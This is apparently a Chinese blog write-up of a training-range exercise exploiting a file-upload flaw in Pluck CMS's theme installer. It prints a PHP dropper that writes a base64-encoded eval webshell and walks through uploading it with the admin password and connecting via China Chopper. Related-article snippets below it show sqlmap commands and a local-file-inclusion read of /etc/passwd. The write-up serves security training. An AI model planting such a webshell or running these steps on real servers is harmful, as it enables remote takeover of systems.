东塔靶场之文件上传cms--pluck

最新推荐文章于 2023-06-29 17:26:01 发布
最新推荐文章于 2023-06-29 17:26:01 发布
阅读量793 收藏 2
点赞数
分类专栏: unsafefileupload 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/115189219
版权

东塔靶场之文件上传cms–pluck


  1. pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等

  2. pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限

准备:

  • 一个info.php文件
<?php file_put_contents('qianxun.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+'));?>

其中PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+是一句话木马<?php @eval($_POST[cmd]); ?>的base64编码。

file_put_contents函数把一个字符串写入文件中。与依次调用 fopen(),fwrite() 以及 fclose() 功能一样。

  • 将info.php文件打包成shell.zip文件
  • 菜刀、浏览器

开搞:

打开主页登录:

image-20210324215349225

密码为admin

image-20210324215439405

进入到选择主题界面:

image-20210324215528836

点击安装主题:

image-20210324215634264

将之前准备的shell.zip上传:

image-20210324215724444

点击回到主题页:

image-20210324215809930

此时,shell.zip已被自动解压,其中的一句话木马已被写入。

直接用菜刀连接获取shell:
image-20210324220126826

成功!

image-20210324220151866

小结:

今天刷了东塔的文件上传类的靶场,感觉系统学过一边后通关很简单,能把学到的用起来就很爽,正所谓学而时习之,不亦说乎?哈哈哈,不过还需要继续练习更多才能开阔思路,运用到实战,明天继续加油!over

0ak1ey
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传-进阶篇之CMS实战
r_deku的博客
03-24 566
sql数字型注入-东塔靶场
qq_27846373的博客
03-26 5337
sql数字型注入-东塔靶场 超级简单,非常适合新手找信心 环境及准备: vmvare安装kali2018,没有2018其他版本kali也行 kali自带的sqlmap 靶场东塔靶场数字型注入,免费使用的噢,注册一个账号就行 https://labs.do-ta.com/index/course/index?one=15&two=17&three=0&level=0&other=-1&title= 首先打开linux的终端,输入sqlmap就可以启动sqlmap.
Pluck Cms文件上传结合命令执行复现
晚安這個未知的世界
03-14 1063
本漏洞影响 Pluck CMS Pluck CMS <=4.7.10 安装模版+文件包含导致任意命令执行 很多CMS都会在安装模版的时候getshell,那么这里笔者也发现了类似的漏洞。 在阅读自己下载下来得源码之后看到 目录下有.htaccess文件,直接把php设置为不可解析,所以无法直接访问 所以就想到需要找一个位置对其进行包含,来达到执行的目的。 首先看到admin.php中关于theme的部分 跟进 data/inc/theme.php,发现调用了get_themes()方法 跟进 fu
VulnHub - Pluck靶机
小小猪的博客
06-08 460
VulnHub - Pluck靶机 arp-scan -l 探测靶机地址 nmap -sV -Pn -A x.x.x.230 dirb http://x.x.x.230 扫描目录 发现index.php 目录下存在文件包含漏洞 直接修改page参数,经几次修改,发现可读本地文件../../../etc/passwd 从上图看到passwd文件最下方有个backup.sh的文件路径,用文件包含访问 根据所给的提示,直接用tftp下载/backups/backup.t.
东塔靶场:SQL注入之get注入1
weixin_51646864的博客
09-12 1551
1、点开链接进入靶场 2、直接sqlmap拖库:sqlmap -u http://120.25.24.45:30833/index.php?user=harry --current-db 得到数据库名为"dotaxueyuan" 3、看一下这个库的表:sqlmap -u http://120.25.24.45:30833/index.php?user=harry -D dotaxueyuan --tables 发现里面有key和users两个表 3、猜测通关的key藏在key表中,查看该表的列 sql
CVE-2020-11890:CVE-2020-11890
03-10
香港制造 CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员...
非光学太阳能跟踪器(东塔2.4KW)-项目开发
03-30
计算太阳相对于地球上跟踪器位置的位置,并将阵列指向太阳。
交通安全班会课设计ppt-灵武市东塔学校网站首页.pptx
09-26
交通安全班会课设计ppt-灵武市东塔学校网站首页.pptx
大桥东塔桩基冻结法施工技术.docx
12-04
大桥东塔桩基冻结法施工技术
沈阳东塔跨浑河桥钢结构施工方案.doc
11-20
沈阳东塔跨浑河桥钢结构施工方案
pavo:用Golang编写的jQuery-File-Upload服务器端上传服务
02-04
帕沃 使用Golang编写的服务器端上传服务。 用法 使用以下命令从控制台运行: $ bin/pavo --host=localhost:9078 --storage=/path/to/root/storage 例 构建后运行应用程序: $ bin/pavo --storage=dummy/root_storage 在浏览器中打开示例页面: open http://localhost:9073/example/jfu-basic.html 安装 安装golang Golang。 设置环境变量。 例如对于MacOS: brew install go mkdir $HOME /go #
cms项目的相关代码和jar包
02-27
CMS项目的相关资源:包含后台图片管理,后台职位管理,用户登录,用户注册,用户邮箱激活,前台展示,用户登录,高级查询。 项目的主要技术: web框架spring+springmvc+springjdbc 前端框架:bootstrap 职位和轮播图的CRUD 分页对象—显示职位和轮播管理信息 富文本编辑器wangeditor—优化相关展示信息 页面静态化技术freemarker—优化访问服务器过多,效率低 缓存技术ehcache----优化访问服务器过多,效率低 高级查询技术—简单提供职位的精确查询 邮箱激活技术 Spring拦截器—后台访问安全
pluck v4.7.4
10-23
pluck是一个小型简单的内容管理系统,由PHP写成.即使你没有编程语言知识.也可以用它来很容易地管理站点.用它你可以做1,在你的页面里插入照片- 2,在你的blog里面写文章 3,用album-option来和世界各地的朋友分享你最爱的照片和相片 4,通过页面上的email表单你可以和你站点访客保持联系 5,更改站点信息,使其更利于搜索引擎 6,下载并安装新的主题,使你的站点拥有一个新的感觉 7,一个美丽的关于访客的流量统计表8,以你自己的语言编辑你的网页 9,符合 W3C XHTML-输出 10,它易于使用,直观并拥有一个漂亮的管理中心
东塔靶场——基于表单的暴力破解
m0_50211409的博客
03-24 475
burp介绍。 burp是一个非常强大的工具,burp是在浏览器与服务器之间的一个双向代理工具,可以将用户和服务器之间发送的数据包进行拦截下来!进行分析 测试环境! 1:东塔靶场 2:burp工具 *配置burp和火狐浏览器代理 首先在上面我们知道burp在浏览器是以代理存在的,如果想要拦截数据包我们需要设置一个代理。 1,设置burp代理 ...
web靶场搭建之帝国cms7.5
m0_60716947的博客
12-18 3832
帝国cms
CKEditor和UEditor使用比较
meimonkey的专栏
08-05 1万+
CKEditor和UEditor使用比较 本来项目中使用CKEditor已经做好了的富文本编辑器的功能,但是业务考虑到美观性要求换成UEditor,所以就在这里总结下 先说下使用这两个不同插件的感想,我用的ueditor是1.4.3的版本:(ueditor API) UEditor:ueditor更注重用户体验,而且使用起来较ckeditor简单,但是ueditor在处理
FileUpload控件的用法
热门推荐
yingjiell的专栏
10-28 3万+
<br />FileUpload控件是一个很重要的控件,它被Web服务器最终解释为形如“<input type=”file”…/>”这样的普通HTML控件。<br />它有如下常见属性:<br /> <br />属性名 数据类型 说明 <br />FileBytes byte[] 上传的文件内容的字节数组表示形式 <br />FileContent Stream 上传文件的数据流 <br />FileName string 上传文件在客户端的名字 <br />HasFile bool 指示是否上传了文件 <
SpringCloud yml 配置feign整合FtpClient连接池实现文件上传下载微服务
boomLJiE的博客
04-18 2934
感谢:Keepalived,和寄点以及网友分享的博客,以下是我整理的在 相關連接:https://blog.csdn.net/qq_39914581/article/details/88660133 https://blog.csdn.net/qq_17655941/article/details/80758133 SpringCloud feign整合FtpClient连接池实现文件上传下...
春秋云镜 CVE-2022-26965
qq_22002773的博客
06-29 361
春秋云镜 CVE-2022-26965
广州建筑、水系、路网shp
最新发布
07-28
广州是中国的第三大城市,也是广东省的省会,具有丰富的建筑、水系和路网资源。广州的建筑风格多样,古代建筑和现代高楼并存,展现了传统与现代的完美融合。 在广州,可以看到许多具有历史价值的古建筑,如五羊石像、天字码头等。这些古建筑以其精美的工艺和独特的建筑风格吸引着大量游客。此外,广州还有许多现代化的高楼大厦,如广州塔、广州东塔等,它们独特的外观和先进的建筑技术,展示了广州现代城市的面貌。 广州的水系十分发达,有着众多的河流和湖泊。珠江是广州最重要的水系之一,它贯穿市区,提供了重要的交通和物流资源。此外,广州还拥有白云湖、三元里湖等湖泊,这些湖泊景色优美,成为市民休闲娱乐的好去处。 广州的路网非常完善,交通便利。市区内有许多宽阔的高速公路和主干道,连接各个区域,方便人们出行。此外,广州地铁也十分发达,覆盖了市区和周边地区,成为广州居民的主要交通工具。广州的交通网络为城市的发展和居民的生活提供了便利条件。 综上所述,广州拥有丰富多样的建筑、水系和路网资源,展示了城市的魅力和发展潜力。广州的建筑风格多样,水系发达,路网完善,为城市的发展和居民的生活提供了良好的条件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值